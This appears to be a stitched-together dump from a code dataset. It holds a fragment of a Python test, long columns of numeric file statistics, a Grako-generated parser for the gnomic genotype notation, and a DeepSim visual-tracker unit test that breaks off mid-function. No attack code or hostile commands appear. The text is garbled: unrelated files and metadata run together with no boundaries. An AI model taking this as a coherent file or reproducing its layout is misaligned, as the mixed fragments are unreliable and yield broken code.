ussgl487200_downward_adjus_cpe=1, ussgl497200_downward_adjus_cpe=1)
assert number_of_errors(_FILE, database, models=[ap, op_1, op_2]) == 1
| 47.238095
| 108
| 0.782006
| 505
| 3,968
| 5.732673
| 0.170297
| 0.17962
| 0.221071
| 0.164421
| 0.77133
| 0.74715
| 0.74715
| 0.730915
| 0.730915
| 0.730915
| 0
| 0.090802
| 0.147933
| 3,968
| 83
| 109
| 47.807229
| 0.765454
| 0.192288
| 0
| 0.509804
| 0
| 0
| 0.065948
| 0.052632
| 0
| 0
| 0
| 0
| 0.078431
| 1
| 0.078431
| false
| 0
| 0.058824
| 0
| 0.137255
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
36d3c39b3398443ed358df2ae710e768d8df8cc9
| 38,127
|
py
|
Python
|
gnomic/grammar.py
|
biosustain/gnomic
|
a6e6bbfdd6b42e888a3d1c361847ae7bb87c766e
|
[
"Apache-2.0"
] | 9
|
2015-07-13T14:15:11.000Z
|
2020-11-20T18:42:08.000Z
|
gnomic/grammar.py
|
biosustain/gnomic
|
a6e6bbfdd6b42e888a3d1c361847ae7bb87c766e
|
[
"Apache-2.0"
] | 33
|
2015-06-19T08:47:19.000Z
|
2017-09-04T11:30:39.000Z
|
gnomic/grammar.py
|
biosustain/gnomic
|
a6e6bbfdd6b42e888a3d1c361847ae7bb87c766e
|
[
"Apache-2.0"
] | 4
|
2015-10-15T19:10:54.000Z
|
2020-01-22T09:53:18.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# CAVEAT UTILITOR
#
# This file was automatically generated by Grako.
#
# https://pypi.python.org/pypi/grako/
#
# Any changes you make to it will be overwritten the next time
# the file is generated.
from __future__ import print_function, division, absolute_import, unicode_literals
from grako.buffering import Buffer
from grako.parsing import graken, Parser
from grako.util import re, RE_FLAGS, generic_main # noqa
__all__ = [
'GnomicParser',
'GnomicSemantics',
'main'
]
KEYWORDS = {}
class GnomicBuffer(Buffer):
def __init__(
self,
text,
whitespace=re.compile('[\\t ]+', RE_FLAGS | re.DOTALL),
nameguard=None,
comments_re=None,
eol_comments_re=None,
ignorecase=None,
namechars='',
**kwargs
):
super(GnomicBuffer, self).__init__(
text,
whitespace=whitespace,
nameguard=nameguard,
comments_re=comments_re,
eol_comments_re=eol_comments_re,
ignorecase=ignorecase,
namechars=namechars,
**kwargs
)
class GnomicParser(Parser):
def __init__(
self,
whitespace=re.compile('[\\t ]+', RE_FLAGS | re.DOTALL),
nameguard=None,
comments_re=None,
eol_comments_re=None,
ignorecase=None,
left_recursion=False,
parseinfo=True,
keywords=None,
namechars='',
buffer_class=GnomicBuffer,
**kwargs
):
if keywords is None:
keywords = KEYWORDS
super(GnomicParser, self).__init__(
whitespace=whitespace,
nameguard=nameguard,
comments_re=comments_re,
eol_comments_re=eol_comments_re,
ignorecase=ignorecase,
left_recursion=left_recursion,
parseinfo=parseinfo,
keywords=keywords,
namechars=namechars,
buffer_class=buffer_class,
**kwargs
)
@graken()
def _SEQUENCE_VARIANT_(self):
with self._choice():
with self._option():
self._DNA_SEQUENCE_VARIANT_()
with self._option():
self._PROTEIN_SEQUENCE_VARIANT_()
self._error('no available options')
@graken()
def _DNA_SEQUENCE_VARIANT_(self):
with self._group():
with self._choice():
with self._option():
self._token('g')
with self._option():
self._token('c')
with self._option():
self._token('n')
self._error('expecting one of: c g n')
self._token('.')
with self._group():
with self._choice():
with self._option():
self._INTEGER_()
self._NUCLEOTIDE_()
self._token('>')
self._NUCLEOTIDE_()
with self._option():
self._INTEGER_()
self._token('+')
self._INTEGER_()
self._NUCLEOTIDE_()
self._token('>')
self._NUCLEOTIDE_()
with self._option():
self._token('[')
self._INTEGER_()
self._NUCLEOTIDE_()
self._token('>')
self._NUCLEOTIDE_()
self._token(';')
self._INTEGER_()
self._NUCLEOTIDE_()
self._token('>')
self._NUCLEOTIDE_()
self._token(']')
with self._option():
self._INTEGER_()
with self._group():
with self._choice():
with self._option():
self._token('=//')
with self._option():
self._token('=/')
self._error('expecting one of: =/ =//')
self._NUCLEOTIDE_()
self._token('>')
self._NUCLEOTIDE_()
with self._option():
self._INTEGER_()
self._token('=')
with self._option():
self._INTEGER_()
self._token('+')
self._INTEGER_()
self._token('del')
with self._option():
self._INTEGER_()
self._token('_')
self._INTEGER_()
with self._group():
with self._choice():
with self._option():
self._token('del=//del')
with self._option():
self._token('=/del')
self._error('expecting one of: =/del del=//del')
with self._option():
self._INTEGER_()
self._token('_')
self._INTEGER_()
self._token('ins')
with self._group():
with self._choice():
with self._option():
self._NUCLEOTIDE_SEQUENCE_()
with self._option():
self._token('(')
self._INTEGER_()
self._token(')')
self._error('no available options')
with self._option():
self._INTEGER_()
self._token('_')
self._INTEGER_()
self._token('ins')
self._pattern(r'\w')
self._INTEGER_()
self._token('.')
self._INTEGER_()
self._token(':')
self._INTEGER_()
self._token('_')
self._INTEGER_()
with self._option():
self._INTEGER_()
self._token('_')
self._INTEGER_()
self._token('ins')
self._INTEGER_()
self._token('_')
self._INTEGER_()
self._token('inv')
with self._optional():
self._INTEGER_()
self._token('_')
self._INTEGER_()
self._token('inv')
with self._option():
self._token('(')
self._INTEGER_()
self._token('_')
self._INTEGER_()
self._token(')ins')
self._NUCLEOTIDE_()
self._token('(')
self._PROTEIN_SEQUENCE_VARIANT_()
self._token(')')
with self._option():
self._token('(')
self._INTEGER_()
self._token('+')
self._INTEGER_()
self._token('_')
self._INTEGER_()
self._token('-')
self._INTEGER_()
self._token(')_(')
self._INTEGER_()
self._token('+')
self._INTEGER_()
self._token('_')
self._INTEGER_()
self._token('-')
self._INTEGER_()
self._token(')')
with self._group():
with self._choice():
with self._option():
self._token('dup')
with self._option():
self._token('[')
self._INTEGER_()
self._token(']')
self._error('expecting one of: dup')
with self._option():
self._INTEGER_()
self._token('_')
self._INTEGER_()
self._token('con')
self._INTEGER_()
self._token('_')
self._INTEGER_()
with self._option():
self._INTEGER_()
self._token('delins')
self._NUCLEOTIDE_SEQUENCE_()
with self._option():
self._INTEGER_()
self._token('_')
self._INTEGER_()
self._token('delins')
self._NUCLEOTIDE_SEQUENCE_()
with self._option():
self._INTEGER_()
self._token('_')
self._INTEGER_()
self._token('[')
self._INTEGER_()
self._token(']')
with self._optional():
self._token(';[')
self._INTEGER_()
self._token(']')
with self._option():
self._token('-')
self._INTEGER_()
self._token('_-')
self._INTEGER_()
self._token('[')
with self._group():
with self._choice():
with self._option():
self._token('(')
self._INTEGER_()
self._token('_')
self._INTEGER_()
self._token(')')
with self._option():
self._INTEGER_()
self._error('no available options')
self._token(']')
with self._option():
self._INTEGER_()
self._pattern(r'([ACGTBDHKMNRSVWY]{3}\[\d+\])+')
with self._option():
self._INTEGER_()
self._token('-')
self._INTEGER_()
self._token('_')
self._INTEGER_()
self._token('-')
self._INTEGER_()
self._DEL_DUP_()
with self._option():
self._INTEGER_()
self._DEL_DUP_()
with self._option():
self._INTEGER_()
self._token('_')
self._INTEGER_()
with self._group():
with self._choice():
with self._option():
self._DEL_DUP_()
with self._option():
self._token('inv')
self._error('expecting one of: inv')
with self._option():
self._INTEGER_()
self._token('_')
self._INTEGER_()
self._token('+')
self._INTEGER_()
self._DEL_DUP_()
with self._option():
self._token('(?_-')
self._INTEGER_()
self._token(')_(*')
self._INTEGER_()
self._token('_?)')
self._DEL_DUP_()
with self._option():
self._token('(?_-')
self._INTEGER_()
self._token(')_(')
self._INTEGER_()
self._token('+')
self._INTEGER_()
self._token('_')
self._INTEGER_()
self._token('-')
self._INTEGER_()
self._token(')')
self._DEL_DUP_()
self._error('no available options')
@graken()
def _DEL_DUP_(self):
with self._group():
with self._choice():
with self._option():
self._token('del')
with self._option():
self._token('dup')
self._error('expecting one of: del dup')
@graken()
def _NUCLEOTIDE_(self):
self._pattern(r'[ACGTBDHKMNRSVWY]')
@graken()
def _NUCLEOTIDE_SEQUENCE_(self):
def block0():
self._NUCLEOTIDE_()
self._positive_closure(block0)
@graken()
def _PROTEIN_SEQUENCE_VARIANT_(self):
self._token('p.')
with self._group():
with self._choice():
with self._option():
with self._group():
with self._choice():
with self._option():
self._AMINO_ACID_()
with self._option():
self._token('*')
self._error('expecting one of: *')
self._INTEGER_()
with self._optional():
self._AMINO_ACID_SEQUENCE_()
self._token('ext')
with self._group():
with self._choice():
with self._option():
with self._group():
with self._choice():
with self._option():
self._token('-')
with self._option():
self._token('*')
self._error('expecting one of: * -')
self._INTEGER_()
with self._option():
self._token('*?')
with self._option():
self._token('*')
self._error('expecting one of: * *?')
with self._option():
self._token('(')
self._AMINO_ACID_()
self._INTEGER_()
self._AMINO_ACID_()
self._token('ext')
self._AMINO_ACID_SEQUENCE_()
self._token(')')
with self._option():
self._AMINO_ACID_()
self._INTEGER_()
self._AMINO_ACID_()
self._token('fs')
self._AMINO_ACID_()
self._INTEGER_()
with self._option():
self._AMINO_ACID_()
self._INTEGER_()
self._token('fs')
with self._option():
self._AMINO_ACID_()
self._INTEGER_()
self._AMINO_ACID_()
self._token('fs*')
with self._group():
with self._choice():
with self._option():
self._INTEGER_()
with self._option():
self._token('?')
self._error('expecting one of: ?')
with self._option():
self._AMINO_ACID_()
self._INTEGER_()
self._token('delins')
self._AMINO_ACID_SEQUENCE_()
with self._option():
self._AMINO_ACID_()
self._INTEGER_()
self._token('_')
self._AMINO_ACID_()
self._INTEGER_()
with self._group():
with self._choice():
with self._option():
self._token('ins')
with self._option():
self._token('delins')
self._error('expecting one of: delins ins')
with self._group():
with self._choice():
with self._option():
self._AMINO_ACID_SEQUENCE_()
with self._option():
self._INTEGER_()
self._error('no available options')
with self._option():
self._token('(')
self._AMINO_ACID_()
self._INTEGER_()
self._token('_')
self._AMINO_ACID_()
self._INTEGER_()
with self._group():
with self._choice():
with self._option():
self._token('ins')
with self._option():
self._token('delins')
self._error('expecting one of: delins ins')
with self._group():
with self._choice():
with self._option():
self._AMINO_ACID_SEQUENCE_()
with self._option():
self._INTEGER_()
self._error('no available options')
self._token(')')
with self._option():
self._token('[')
self._AMINO_ACID_()
self._INTEGER_()
self._AMINO_ACID_()
self._token(';')
self._AMINO_ACID_()
self._INTEGER_()
self._AMINO_ACID_()
self._token(']')
with self._option():
self._AMINO_ACID_()
self._INTEGER_()
self._AMINO_ACID_()
with self._option():
self._token('(')
self._AMINO_ACID_()
self._INTEGER_()
with self._group():
with self._choice():
with self._option():
self._token('*')
with self._option():
self._token('Ter')
with self._option():
self._token('=')
with self._option():
self._token('?')
with self._option():
self._AMINO_ACID_()
self._error('expecting one of: * = ? Ter')
self._token(')')
with self._option():
self._AMINO_ACID_()
self._INTEGER_()
with self._group():
with self._choice():
with self._option():
self._token('*')
with self._option():
self._token('Ter')
with self._option():
self._token('=')
with self._option():
self._token('?')
with self._option():
self._AMINO_ACID_()
self._error('expecting one of: * = ? Ter')
with self._option():
self._token('0')
with self._option():
self._token('?')
with self._option():
self._AMINO_ACID_()
self._INTEGER_()
self._DEL_DUP_()
with self._option():
self._token('(')
self._AMINO_ACID_()
self._INTEGER_()
self._DEL_DUP_()
self._token(')')
with self._option():
self._AMINO_ACID_()
self._INTEGER_()
self._token('_')
self._AMINO_ACID_()
self._INTEGER_()
self._DEL_DUP_()
with self._option():
self._AMINO_ACID_()
self._INTEGER_()
self._token('[')
self._INTEGER_()
self._token(']')
with self._optional():
self._token(';[')
self._INTEGER_()
self._token(']')
with self._option():
self._token('(')
self._AMINO_ACID_()
self._INTEGER_()
self._token(')[(')
self._INTEGER_()
self._token('_')
self._INTEGER_()
self._token(')]')
self._error('expecting one of: 0 ?')
@graken()
def _AMINO_ACID_(self):
self._pattern(r'[A-Z]([a-z]{2})?')
@graken()
def _AMINO_ACID_SEQUENCE_(self):
def block0():
self._AMINO_ACID_()
self._positive_closure(block0)
@graken()
def _VARIABLE_VARIANT_(self):
self._VARIABLE_VARIANT_IDENTIFIER_()
self._token('=')
self._VARIABLE_VARIANT_VALUE_()
@graken()
def _VARIABLE_VARIANT_IDENTIFIER_(self):
self._pattern(r'[a-z0-9][a-zA-Z0-9]*(\.[a-z0-9][a-zA-Z0-9]*)*')
@graken()
def _VARIABLE_VARIANT_VALUE_(self):
with self._choice():
with self._option():
self._NUMBER_()
with self._option():
self._QUOTED_STRING_()
with self._option():
self._UNQUOTED_STRING_()
self._error('no available options')
@graken()
def _NUMBER_(self):
self._pattern(r'[-+]?[0-9]*\.?[0-9]+([eE][-+]?[0-9]+)?')
@graken()
def _QUOTED_STRING_(self):
self._pattern(r'"(?:[^"\\]|\\.)*"')
@graken()
def _UNQUOTED_STRING_(self):
self._pattern(r'[a-zA-Z0-9]+')
@graken()
def _start_(self):
with self._optional():
self._SEP_()
with self._group():
with self._choice():
with self._option():
self._CHANGE_()
self.add_last_node_to_name('@')
def block1():
self._LIST_SEPARATOR_()
self._CHANGE_()
self.add_last_node_to_name('@')
self._closure(block1)
with self._option():
self._empty_closure()
self._error('no available options')
with self._optional():
self._SEP_()
self._check_eof()
@graken()
def _CHANGE_(self):
with self._choice():
with self._option():
self._INSERTION_()
with self._option():
self._REPLACEMENT_()
with self._option():
self._DELETION_()
with self._option():
self._PLASMID_()
with self._option():
self._PHENE_()
self._error('no available options')
@graken()
def _INSERTION_(self):
self._token('+')
self._ANNOTATION_()
self.name_last_node('after')
self.ast._define(
['after'],
[]
)
@graken()
def _REPLACEMENT_(self):
with self._choice():
with self._option():
with self._group():
with self._choice():
with self._option():
self._ANNOTATION_AT_LOCUS_()
with self._option():
self._ANNOTATION_()
self._error('no available options')
self.name_last_node('before')
self._token('>')
self.name_last_node('op')
with self._group():
with self._choice():
with self._option():
self._PLASMID_()
with self._option():
self._ANNOTATION_()
self._error('no available options')
self.name_last_node('after')
with self._option():
with self._group():
with self._choice():
with self._option():
self._ANNOTATION_AT_LOCUS_()
with self._option():
self._ANNOTATION_()
self._error('no available options')
self.name_last_node('before')
self._token('>>')
self.name_last_node('op')
with self._group():
with self._choice():
with self._option():
self._PLASMID_()
with self._option():
self._ANNOTATION_()
self._error('no available options')
self.name_last_node('after')
self._error('no available options')
self.ast._define(
['after', 'before', 'op'],
[]
)
@graken()
def _DELETION_(self):
self._token('-')
with self._group():
with self._choice():
with self._option():
self._PLASMID_()
with self._option():
self._ANNOTATION_AT_LOCUS_()
with self._option():
self._ANNOTATION_()
self._error('no available options')
self.name_last_node('before')
self.ast._define(
['before'],
[]
)
@graken()
def _PLASMID_(self):
with self._choice():
with self._option():
self._token('(')
self._IDENTIFIER_()
self.name_last_node('name')
self._SEP_()
self._ANNOTATIONS_()
self.name_last_node('annotations')
self._token(')')
with self._option():
self._token('(')
self._IDENTIFIER_()
self.name_last_node('name')
self._token(')')
self._error('no available options')
self.ast._define(
['annotations', 'name'],
[]
)
@graken()
def _ANNOTATION_AT_LOCUS_(self):
self._ANNOTATION_()
self.name_last_node('annotation')
self._token('@')
self._FEATURE_()
self.name_last_node('locus')
self.ast._define(
['annotation', 'locus'],
[]
)
@graken()
def _ANNOTATION_(self):
with self._choice():
with self._option():
self._FUSION_()
with self._option():
self._FEATURE_()
with self._option():
self._COMPOSITE_ANNOTATION_()
self._error('no available options')
@graken()
def _ANNOTATIONS_(self):
with self._optional():
self._SEP_()
with self._group():
with self._choice():
with self._option():
self._FEATURE_FUSION_()
with self._option():
self._FEATURE_()
self._error('no available options')
self.add_last_node_to_name('@')
def block2():
self._LIST_SEPARATOR_()
with self._group():
with self._choice():
with self._option():
self._FEATURE_FUSION_()
with self._option():
self._FEATURE_()
self._error('no available options')
self.add_last_node_to_name('@')
self._closure(block2)
with self._optional():
self._SEP_()
@graken()
def _COMPOSITE_ANNOTATION_(self):
self._token('{')
self._ANNOTATIONS_()
self.name_last_node('@')
self._token('}')
@graken()
def _FUSION_(self):
with self._group():
with self._choice():
with self._option():
self._COMPOSITE_ANNOTATION_()
with self._option():
self._FEATURE_()
self._error('no available options')
self.add_last_node_to_name('@')
def block2():
self._token(':')
with self._group():
with self._choice():
with self._option():
self._COMPOSITE_ANNOTATION_()
with self._option():
self._FEATURE_()
self._error('no available options')
self.add_last_node_to_name('@')
self._positive_closure(block2)
@graken()
def _FEATURE_FUSION_(self):
self._FEATURE_()
self.add_last_node_to_name('@')
def block1():
self._token(':')
self._FEATURE_()
self.add_last_node_to_name('@')
self._positive_closure(block1)
@graken()
def _FEATURE_(self):
with self._choice():
with self._option():
with self._optional():
self._FEATURE_ORGANISM_()
self.name_last_node('organism')
with self._optional():
self._IDENTIFIER_()
self.name_last_node('type')
self._token('.')
self._IDENTIFIER_()
self.name_last_node('name')
with self._optional():
self._ACCESSION_()
self.name_last_node('accession')
with self._optional():
self._FEATURE_VARIANT_()
self.name_last_node('variant')
with self._option():
self._ACCESSION_()
self.name_last_node('accession')
with self._optional():
self._FEATURE_VARIANT_()
self.name_last_node('variant')
self._error('no available options')
self.ast._define(
['accession', 'name', 'organism', 'type', 'variant'],
[]
)
@graken()
def _PHENE_(self):
with self._choice():
with self._option():
with self._optional():
self._FEATURE_ORGANISM_()
self.name_last_node('organism')
with self._optional():
self._IDENTIFIER_()
self.name_last_node('type')
self._token('.')
self._IDENTIFIER_()
self.name_last_node('name')
with self._optional():
self._ACCESSION_()
self.name_last_node('accession')
self._FEATURE_VARIANT_()
self.name_last_node('variant')
with self._option():
self._ACCESSION_()
self.name_last_node('accession')
self._FEATURE_VARIANT_()
self.name_last_node('variant')
self._error('no available options')
self.ast._define(
['accession', 'name', 'organism', 'type', 'variant'],
[]
)
@graken()
def _FEATURE_ORGANISM_(self):
self._ORGANISM_IDENTIFIER_()
self.name_last_node('@')
self._token('/')
@graken()
def _ORGANISM_IDENTIFIER_(self):
self._pattern(r'[a-zA-Z0-9]+(\.[a-zA-Z0-9]+)?')
@graken()
def _ACCESSION_(self):
with self._choice():
with self._option():
self._token('#')
self._DATABASE_()
self.name_last_node('db')
self._token(':')
with self._group():
with self._choice():
with self._option():
self._INTEGER_()
with self._option():
self._IDENTIFIER_()
self._error('no available options')
self.name_last_node('id')
with self._option():
self._token('#')
with self._group():
with self._choice():
with self._option():
self._INTEGER_()
with self._option():
self._IDENTIFIER_()
self._error('no available options')
self.name_last_node('id')
self._error('no available options')
self.ast._define(
['db', 'id'],
[]
)
@graken()
def _DATABASE_(self):
self._pattern(r'[A-Za-z0-9-][A-Za-z0-9]+')
@graken()
def _INTEGER_(self):
self._pattern(r'[0-9]+')
self.name_last_node('@')
@graken()
def _FEATURE_VARIANT_(self):
self._token('(')
self._VARIANT_()
self.add_last_node_to_name('@')
def block1():
with self._group():
with self._choice():
with self._option():
self._token(',')
with self._option():
self._token(';')
self._error('expecting one of: , ;')
with self._optional():
self._SEP_()
self._VARIANT_()
self.add_last_node_to_name('@')
self._closure(block1)
self._token(')')
@graken()
def _VARIANT_(self):
with self._group():
with self._choice():
with self._option():
self._VARIABLE_VARIANT_()
with self._option():
self._SEQUENCE_VARIANT_()
with self._option():
self._VARIANT_IDENTIFIER_()
self._error('no available options')
@graken()
def _VARIANT_IDENTIFIER_(self):
self._pattern(r'[A-Za-z0-9]+([A-Za-z0-9_\-]+[A-Za-z0-9])?')
@graken()
def _IDENTIFIER_(self):
self._pattern(r'[a-zA-Z0-9]+([A-Za-z0-9_-]+[A-Za-z0-9])?')
@graken()
def _LIST_SEPARATOR_(self):
with self._group():
with self._choice():
with self._option():
self._SEP_()
with self._option():
self._token(',')
with self._optional():
self._SEP_()
self._error('expecting one of: ,')
@graken()
def _SEP_(self):
self._pattern(r'[\t ]+')
class GnomicSemantics(object):
def SEQUENCE_VARIANT(self, ast):
return ast
def DNA_SEQUENCE_VARIANT(self, ast):
return ast
def DEL_DUP(self, ast):
return ast
def NUCLEOTIDE(self, ast):
return ast
def NUCLEOTIDE_SEQUENCE(self, ast):
return ast
def PROTEIN_SEQUENCE_VARIANT(self, ast):
return ast
def AMINO_ACID(self, ast):
return ast
def AMINO_ACID_SEQUENCE(self, ast):
return ast
def VARIABLE_VARIANT(self, ast):
return ast
def VARIABLE_VARIANT_IDENTIFIER(self, ast):
return ast
def VARIABLE_VARIANT_VALUE(self, ast):
return ast
def NUMBER(self, ast):
return ast
def QUOTED_STRING(self, ast):
return ast
def UNQUOTED_STRING(self, ast):
return ast
def start(self, ast):
return ast
def CHANGE(self, ast):
return ast
def INSERTION(self, ast):
return ast
def REPLACEMENT(self, ast):
return ast
def DELETION(self, ast):
return ast
def PLASMID(self, ast):
return ast
def ANNOTATION_AT_LOCUS(self, ast):
return ast
def ANNOTATION(self, ast):
return ast
def ANNOTATIONS(self, ast):
return ast
def COMPOSITE_ANNOTATION(self, ast):
return ast
def FUSION(self, ast):
return ast
def FEATURE_FUSION(self, ast):
return ast
def FEATURE(self, ast):
return ast
def PHENE(self, ast):
return ast
def FEATURE_ORGANISM(self, ast):
return ast
def ORGANISM_IDENTIFIER(self, ast):
return ast
def ACCESSION(self, ast):
return ast
def DATABASE(self, ast):
return ast
def INTEGER(self, ast):
return ast
def FEATURE_VARIANT(self, ast):
return ast
def VARIANT(self, ast):
return ast
def VARIANT_IDENTIFIER(self, ast):
return ast
def IDENTIFIER(self, ast):
return ast
def LIST_SEPARATOR(self, ast):
return ast
def SEP(self, ast):
return ast
def main(filename, startrule, **kwargs):
with open(filename) as f:
text = f.read()
parser = GnomicParser(parseinfo=False)
return parser.parse(text, startrule, filename=filename, **kwargs)
if __name__ == '__main__':
import json
ast = generic_main(main, GnomicParser, name='Gnomic')
print('AST:')
print(ast)
print()
print('JSON:')
print(json.dumps(ast, indent=2))
print()
| 33.503515
| 82
| 0.417054
| 3,018
| 38,127
| 4.809145
| 0.062293
| 0.131735
| 0.136971
| 0.168665
| 0.836985
| 0.784277
| 0.717928
| 0.66081
| 0.623674
| 0.605484
| 0
| 0.002886
| 0.472867
| 38,127
| 1,137
| 83
| 33.532982
| 0.719276
| 0.006137
| 0
| 0.79922
| 1
| 0.002924
| 0.050314
| 0.00652
| 0
| 0
| 0
| 0
| 0
| 1
| 0.08577
| false
| 0
| 0.004873
| 0.038012
| 0.132554
| 0.006823
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
183086b4f2ed4d3cacd8eef48ebe4fdb36d63923
| 27,698
|
py
|
Python
|
deepsim/test/test_deepsim/sim_trackers/trackers/test_get_visual_tracker.py
|
aws-deepracer/deepsim
|
cad2639f525c2f94ec5c03d8b855cc65b0b8ee55
|
[
"Apache-2.0"
] | 1
|
2022-03-25T07:20:49.000Z
|
2022-03-25T07:20:49.000Z
|
deepsim/test/test_deepsim/sim_trackers/trackers/test_get_visual_tracker.py
|
aws-deepracer/deepsim
|
cad2639f525c2f94ec5c03d8b855cc65b0b8ee55
|
[
"Apache-2.0"
] | null | null | null |
deepsim/test/test_deepsim/sim_trackers/trackers/test_get_visual_tracker.py
|
aws-deepracer/deepsim
|
cad2639f525c2f94ec5c03d8b855cc65b0b8ee55
|
[
"Apache-2.0"
] | null | null | null |
#################################################################################
# Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved. #
# #
# Licensed under the Apache License, Version 2.0 (the "License"). #
# You may not use this file except in compliance with the License. #
# You may obtain a copy of the License at #
# #
# http://www.apache.org/licenses/LICENSE-2.0 #
# #
# Unless required by applicable law or agreed to in writing, software #
# distributed under the License is distributed on an "AS IS" BASIS, #
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. #
# See the License for the specific language governing permissions and #
# limitations under the License. #
#################################################################################
from typing import Any, Callable
from unittest import TestCase
from unittest.mock import patch, MagicMock, call
import inspect
from deepsim.sim_trackers.trackers.get_visual_tracker import GetVisualTracker
from deepsim.gazebo.constants import GazeboTopicName, GazeboServiceName, GeometryType
from deepsim.core.color import Color
from deepsim.core.vector3 import Vector3
from deepsim.core.pose import Pose
from deepsim.core.quaternion import Quaternion
from deepsim.core.visual import Visual
from deepsim.core.material import Material
from deepsim.exception import DeepSimException
from deepsim_msgs.srv import (
GetVisuals, GetVisualsResponse,
GetAllVisuals, GetAllVisualsResponse
)
from deepsim_msgs.msg import Visuals
myself: Callable[[], Any] = lambda: inspect.stack()[1][3]
@patch("deepsim.sim_trackers.trackers.get_visual_tracker.ServiceProxyWrapper")
class GetVisualTrackerTest(TestCase):
def setUp(self) -> None:
get_visuals_mock = MagicMock()
get_all_visuals_mock = MagicMock()
def get_service_mock(service_name, service_type):
if service_name == GazeboServiceName.GET_VISUALS:
return get_visuals_mock
elif service_name == GazeboServiceName.GET_ALL_VISUALS:
return get_all_visuals_mock
else:
return Exception()
self.get_visuals_mock = get_visuals_mock
self.get_all_visuals_mock = get_all_visuals_mock
self.get_service_mock = get_service_mock
def test_initialize(self, service_proxy_wrapper_mock):
_ = GetVisualTracker(is_singleton=False)
service_proxy_wrapper_mock.assert_has_calls([
call(GazeboServiceName.GET_VISUALS, GetVisuals),
call(GazeboServiceName.GET_ALL_VISUALS, GetAllVisuals)
])
def test_on_update_tracker(self, service_proxy_wrapper_mock):
link_name1 = myself() + "1"
visual_name1 = myself() + "1_visual"
ambient1 = Color(0.1, 0.2, 0.3, 0.4)
diffuse1 = Color(0.2, 0.3, 0.4, 0.5)
specular1 = Color(0.3, 0.4, 0.5, 0.6)
emissive1 = Color(0.4, 0.5, 0.6, 0.7)
transparency1 = 0.3
visible1 = True
geometry_type1 = GeometryType.MESH
mesh_geom_filename1 = myself() + "_mesh_geom_filename1"
mesh_geom_scale1 = Vector3(1.0, 2.0, 3.0)
pose1 = Pose(position=Vector3(2.0, 3.0, 4.0),
orientation=Quaternion(3.0, 4.0, 5.0, 6.0))
link_name2 = myself() + "2"
visual_name2 = myself() + "2_visual"
ambient2 = Color(0.2, 0.2, 0.3, 0.4)
diffuse2 = Color(0.3, 0.3, 0.4, 0.5)
specular2 = Color(0.4, 0.4, 0.5, 0.6)
emissive2 = Color(0.5, 0.5, 0.6, 0.7)
transparency2 = 0.5
visible2 = True
geometry_type2 = GeometryType.BOX
mesh_geom_filename2 = myself() + "_mesh_geom_filename2"
mesh_geom_scale2 = Vector3(2.0, 2.0, 3.0)
pose2 = Pose(position=Vector3(3.0, 3.0, 4.0),
orientation=Quaternion(4.0, 4.0, 5.0, 6.0))
expected_visual1 = Visual(link_name=link_name1,
visual_name=visual_name1,
material=Material(ambient=ambient1,
diffuse=diffuse1,
specular=specular1,
emissive=emissive1),
transparency=transparency1,
visible=visible1,
geometry_type=geometry_type1,
mesh_geom_filename=mesh_geom_filename1,
mesh_geom_scale=mesh_geom_scale1,
pose=pose1)
expected_visual2 = Visual(link_name=link_name2,
visual_name=visual_name2,
material=Material(ambient=ambient2,
diffuse=diffuse2,
specular=specular2,
emissive=emissive2),
transparency=transparency2,
visible=visible2,
geometry_type=geometry_type2,
mesh_geom_filename=mesh_geom_filename2,
mesh_geom_scale=mesh_geom_scale2,
pose=pose2)
res = GetAllVisualsResponse()
res.success = True
res.status_message = ''
res.visuals = [expected_visual1.to_ros(),
expected_visual2.to_ros()]
service_proxy_wrapper_mock.side_effect = self.get_service_mock
self.get_all_visuals_mock.return_value = res
tracker = GetVisualTracker(is_singleton=False)
tracker.on_update_tracker(0.1, None)
assert (link_name1, visual_name1) in tracker._visual_map
assert (link_name2, visual_name2) in tracker._visual_map
assert expected_visual1 == tracker._visual_map[(link_name1, visual_name1)]
assert expected_visual2 == tracker._visual_map[(link_name2, visual_name2)]
def test_get_visual(self, service_proxy_wrapper_mock):
link_name1 = myself() + "1"
visual_name1 = myself() + "1_visual"
ambient1 = Color(0.1, 0.2, 0.3, 0.4)
diffuse1 = Color(0.2, 0.3, 0.4, 0.5)
specular1 = Color(0.3, 0.4, 0.5, 0.6)
emissive1 = Color(0.4, 0.5, 0.6, 0.7)
transparency1 = 0.3
visible1 = True
geometry_type1 = GeometryType.MESH
mesh_geom_filename1 = myself() + "_mesh_geom_filename1"
mesh_geom_scale1 = Vector3(1.0, 2.0, 3.0)
pose1 = Pose(position=Vector3(2.0, 3.0, 4.0),
orientation=Quaternion(3.0, 4.0, 5.0, 6.0))
link_name2 = myself() + "2"
visual_name2 = myself() + "2_visual"
ambient2 = Color(0.2, 0.2, 0.3, 0.4)
diffuse2 = Color(0.3, 0.3, 0.4, 0.5)
specular2 = Color(0.4, 0.4, 0.5, 0.6)
emissive2 = Color(0.5, 0.5, 0.6, 0.7)
transparency2 = 0.5
visible2 = True
geometry_type2 = GeometryType.BOX
mesh_geom_filename2 = myself() + "_mesh_geom_filename2"
mesh_geom_scale2 = Vector3(2.0, 2.0, 3.0)
pose2 = Pose(position=Vector3(3.0, 3.0, 4.0),
orientation=Quaternion(4.0, 4.0, 5.0, 6.0))
expected_visual1 = Visual(link_name=link_name1,
visual_name=visual_name1,
material=Material(ambient=ambient1,
diffuse=diffuse1,
specular=specular1,
emissive=emissive1),
transparency=transparency1,
visible=visible1,
geometry_type=geometry_type1,
mesh_geom_filename=mesh_geom_filename1,
mesh_geom_scale=mesh_geom_scale1,
pose=pose1)
expected_visual2 = Visual(link_name=link_name2,
visual_name=visual_name2,
material=Material(ambient=ambient2,
diffuse=diffuse2,
specular=specular2,
emissive=emissive2),
transparency=transparency2,
visible=visible2,
geometry_type=geometry_type2,
mesh_geom_filename=mesh_geom_filename2,
